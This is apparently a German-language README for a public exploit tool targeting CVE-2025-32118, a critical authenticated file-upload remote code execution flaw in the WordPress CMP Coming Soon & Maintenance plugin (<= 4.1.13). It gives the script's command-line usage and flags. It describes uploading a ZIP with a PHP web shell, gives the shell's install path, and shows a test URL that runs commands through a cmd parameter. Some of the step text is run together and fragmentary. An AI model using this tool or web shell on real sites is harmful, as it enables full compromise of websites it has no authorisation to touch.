
WordPress CMP – Coming Soon & Maintenance Plugin <= 4.1.13 - Remote Code Execution (RCE) Sicherheitslücke
🔍 Titel: WordPress CMP – Coming Soon & Maintenance Plugin <= 4.1.13 - Remote Code Execution (RCE)
🗓️ Veröffentlicht: 2025-04-04
🔐 CWE: CWE-434 - Uneingeschränkter Upload von Dateien mit gefährlichem Typ
📊 CVSS: 9.1 (KRITISCH) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Im CMP – Coming Soon & Maintenance-Plugin für WordPress (<= 4.1.13) besteht eine kritische Remote-Code-Execution-Schwachstelle (RCE).
Diese Schwachstelle erlaubt es einem authentifizierten Admin-Benutzer, schadhafte ZIP-Dateien mit ausführbaren PHP-Shells hochzuladen, was zu einer vollständigen Kompromittierung der Website führt.
<= 4.1.13)python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of WordPress site
-un, --username USERNAME Admin username
-p, --password PASSWORD Admin password
| Flag | Beschreibung |
|---|---|
-u | Basis-URL der WordPress-Website |
-un | Benutzername |
-p | Passwort |
nonce für die Upload-Anfrage ab.style.css (gültiges Theme-Format)nxploitedshell.php (RCE-Payload)?cmd=whoami.Nach erfolgreichem Upload befindet sich die Shell unter:
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php
Teste sie über:
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id
Dieser Exploit dient ausschließlich Bildungszwecken.
Die unbefugte Verwendung dieses Codes gegen Systeme, die dir nicht gehören ist illegal und unethisch.
Nxploited | Khaled Alenazi